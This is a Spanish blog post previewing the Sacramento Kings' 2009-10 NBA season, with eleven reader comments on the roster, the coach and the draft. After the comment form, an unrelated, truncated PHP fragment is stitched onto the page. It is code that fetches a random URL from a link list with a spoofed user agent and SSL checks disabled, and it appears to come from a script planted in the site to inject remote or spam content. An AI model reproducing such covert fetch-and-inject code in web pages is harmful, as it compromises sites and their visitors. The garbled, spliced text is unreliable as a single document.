Sacramento Kings 2009-10: La reconstrucción inacabada

30 de September de 2009 por Dantley

Sacramento Kings se jugará gran parte del éxito de la temporada 2009-10 el día del sorteo del draft 2010, en el que parten como uno de los favoritos para obtener el ansiado número 1 – y con ello a su deseado John Wall-, que no tuvieron la fortuna de obtener en 2009.

Han pasado ya unos años, pero los Kings no acaban de recuperarse aún de las oportunidades perdidas en los años de Adelman. Aquel triple de Horry marcó quizá el principio del fin de las oportunidades de un equipo irrepetible en ataque con Webber, Divac, Stojakovic o Bibby. Desde entonces los cencerros suenan más huecos. Tras varios intentos de encontrar al entrenador ideal para reconstruir la franquicia, los Maloof han confiado este año en un entrenador con mejores números que imagen. Paul Westphal saltó a la fama en los 90 primero como head coach de unos Phoenix Suns que tuvieron su mejor de equipo en el momento más inoportuno, cuando los Bulls comenzaban su década triunfal.

El atípico líder en cancha volverá a ser Kevin Martin. Creemos que el 23 encajaría mejor como un complemento letal en un equipo aspirante al título que como un verdadero jefe de filas. Que no se nos malinterprete, es un gran jugador. Como anotador tiene muchísimos recursos, un gran tiro y una velocidad fantástica, pero eso no siempre es suficiente para liderar un equipo.

La posición de base será confiada a  Tyreke Evans. Es una decisión arriesgada, aunque la alternativa –una vez descartado James Harden- era casi más arriesgada, Ricky Rubio. Evans no es un verdadero base. Puede dirigir a un equipo, pero su mentalidad está más cercana a la del típico escolta con cuerpo de base. Los que ven la botella medio llena hablan de un futuro Wade, los pesimistas ven a uno de tantos Jamal Crawfords que apuntan pero nunca acaban teniendo impacto real. De momento, Tyreke ya se marcó casi 20 puntos, 6 rebotes y 4 asistencias por partido con su nueva camiseta en las ligas de verano. Y eso que llegó tocado.

Curiosamente, el suplente de Evans es uno de los bases más puros de la NBA, Sergio Rodríguez, que tiene la gran oportunidad de demostrar por qué fue capaz en su primer año de promediar tantas asistencias por minuto como el mismísimo Nash. La utilidad de Udrih, lesionado en el Eurobasket, será probablemente lograr un trade que añada mayor flexibilidad para la próxima temporada.

Para el puesto de alero, Francisco García partía por ventaja. Para su desgracia, se ha fracturado un dedo jugando con la ilusionante selección dominicana. Mientras se recupera, probablemente será Nocioni quien aporte su intensidad y el recién llegado Desmond Mason quien tenga minutos de suplente. Donte Greene y Omri Casspi pueden tener minutos en cuanto la franquicia entre en modo John Wall.

Por dentro, además de los suplentes Sean May -que buscará su última oportunidad de demostrar que puede jugar en la NBA- y el eterno Kenny Thomas, Sacramento presenta una ilusionante pareja. Jason Thompson y Spencer Hawes tienen argumentos para tener largas y fructíferas carreras en la NBA. Jason Thompson, controvertida elección número 12 el año pasado, ha mostrado una solidez envidiable en su año de debut. Su techo no es muy alto, pero superando sus problemas con las faltas y aprendiendo en defensa, será una pieza clave en la reconstrucción. Spencer Hawes tiene momentos en los deja patente su enorme clase con movimientos dignos de los mejores centers de los últimos años. Le falta contundencia y continuidad, quizá como consecuencia de un físico que arroja ciertas dudas. No creemos que llegue a la altura de Divac, donde precisamente en Sacramento, es una comparación inevitable, pero sin duda será uno de los mayores activos para la reconstrucción.

Quinteto: Evans-Martin-García-Thompson-Hawes
Sexto hombre: Nocioni
Pronóstico: 13º a 15º de la conferencia Oeste

Comenta

11 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Uff ¿cuanto tiempo hacía que no entrenaba en NBA Westphall?? Cuantos años!!!!
    El tipo lo hacía bien… qué grandes aquellos Suns de Barkley y qué difícil se lo pusieron a los todopoderosos Bulls. (confieso que yo iba con los soletes)

    El Tyreke Evans tiene muy buena pinta… pero diría que es bastante audaz pensar que le van a dar la titularidad de buenas a primeras. Yo creo que Sergio tiene mucho que decir todavía a eso.

    Los veo como el peor equipo de la liga con cierta diferencia.

      Citar

  2. kantonyo dice:
    #2

    No estoy para nada de acuerdo en la afirmacion: “Puede dirigir a un equipo, pero su mentalidad está más cercana a la del típico escolta con cuerpo de base (Tyreke Evans)”

    Para mi Evans no tiene cuerpo de base, está cercano a los dos metros, y no destaca por su faceta organizadora ni por su juego rapido de pies, ni si quiera por su control de balón. Para mi es un escolta, que incluso podría jugar de alero en algunos casos. Sus cualidades son sobre todo su explosividad para entrar a canasta, su tiro de media distancia, capacidad defensiva y el contragolpe, creo que es un escolta al mas puro estilo Wade.

    Pero igual que le pasó en la Universidad de Memphis, posiblemente no le quede más remedio que jugar de base en Sacramento, al tener a Kevin Martin como escolta.

    Ya sé que es imposible, pero a mi me encantaria ver como quinteto titular a Sergio, Kevin, Tyreke, Thompson y Hawes.

    Estoy de acuerdo en que es una temporada de transición, y que este año posiblemente sean la cenicienta del Oeste, pero no se porque quiero ver jugar a esta franquicia, me apetece.

      Citar

  3. sergio dice:
    #3

    ¿¿¿Que hacia mientras Westphall???¿¿ NCAA??¿¿ television??¿¿ comer nachos??

    Creo que pueden tener la peor plantilla con diferencia, pero tambien que quizas hagan un juego tan vistoso o mas que los Grizzlies porque tienen calidad fuera y trabajo dentro. Si, lo se, no demasiada calidad pero son jovenes y tienen menos presion para ganar que los ositos desde mi punto de vista. A ver la conexion latina Nocioni-Sergio(que nombre mas bonito xD) y como lo hace este año que probablemente sea de las ultimas oportunidades

      Citar

  4. TheDeerHunter dice:
    #4

    Hay una cosa que no hemos comentado… y es que el personal de Sacramento ya está un poco hasta las narices de ver a esta banda y, por lo visto, son una de las ciudades marcadas en rojo para que otros “les birlen” su franquicia NBA.
    Juer… sería casi un sacrilegio ahora mismo…

    Lo que quiero decir es que permanecer inmersos en una reconstrucción eterna no lo pueden aguantar muchos demasiado tiempo…

      Citar

  5. Dantley2 dice:
    #5

    Sergio, lo de Westphal casi estaba semiretirado. Ha hecho desde NCAA con Pepperdine con exitazo de entrada, pero fracaso de salida, hasta televisión como dices, pasando por comer nachos supongo ¡¡¡

    Hay que darle tiempo, cosa que no se si le darán. Diría que salen ganando sobre lo que tenían, aunque la primera opción era Rambis, que les dio calazabas.

    Lo de los Maloofs y Las Vegas siempre está flotando en el ambiente. Dependerá de si hay dinero público para hacer un nuevo pabellón, y precisamente en California y precisamente en su capital, lo del dinero público ahora mismo en nombrar a Satanás.

    Kantonyo, Evans de 3 es tirar mucho hacia arriba. Es un 6’5″, que sí, podría dar como da para que Rudy juegue de 3, pero sí es cierto que la frase sería más correcta como “base con cuerpo de escolta”. Creo que apostarán por él desde el minuto 0 del partido 1. Total, perder partidos no es un problema. Lo único que podría hacer cambiar esto es que quieran darle cancha a Udrih para poder venderlo pronto. Y ojalá Sergio se gane 20 minutos por partido y saque la cabeza.

    Y efectivamente, son candidatos grandísimos a ser los últimos. Las buenas noticias serían quedarse en Sacramento, que Hawes, Evans y Thompson apunten a sólidos jugadores (incluso que los dos primeros huelan a futuros All-Star) y que Kevin Martin aguante a gran nivel 82 partidos. Eso, y que las bolas les sean más favorables esta vez.

      Citar

  6. Jabho dice:
    #6

    Que Kevin Martin jugara 82 partidos seria una sorpresa de las grandes.

    Los peores del Oeste junto con Minny. Y como decís, ya que van a perder 60 partidos, al menos dar minutos a los que puedan crecer (Sergio incluido)

    Yo personalmente no tengo especial interés en ver a los Kings…. pintan a banda

      Citar

  7. Landrusski dice:
    #7

    Bueno de sacramento yo tengo poco que opinar…si me interesa ver algun partido sera por sergio haber si puede demostrar si vale para la NBA o no…una cosita…e oido hablar muxo de john wall y tal pero no e visto nada de el ¿es tan bueno como dicen? o es un pokito de marketing a tope?

      Citar

  8. Txusma dice:
    #8

    Pues de momento, Evans de titular, Udrih de suplente y Rodriguez viendolas pasar. Vente pa’ España!

      Citar

  9. TheDeerHunter dice:
    #9

    Lesión de García. 4 mesecitos.
    A perro flaco…
    edito: se ha partido el brazo al explotarle la pelota hinchable sobre la que hacía pesas… que ostia más tonta!!

      Citar

  10. Dantley2 dice:
    #10

    Mala suerte, uff. Aprovechará para coger más potencia de piernas, pero este era un año ideal para García para hacerse un hueco fijo.

      Citar

  11. Óscar dice:
    #11

    De John Wall es difícil haber visto algo a no ser que puedas ver en directo algún partido de High School o algún torneo de esos tipo McDonald’s… En Draft Express lo dan desde hace semanas como #1 del Draft 2010 y a Kentucky como principal favorito con varios de los mejores freshmen del país.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>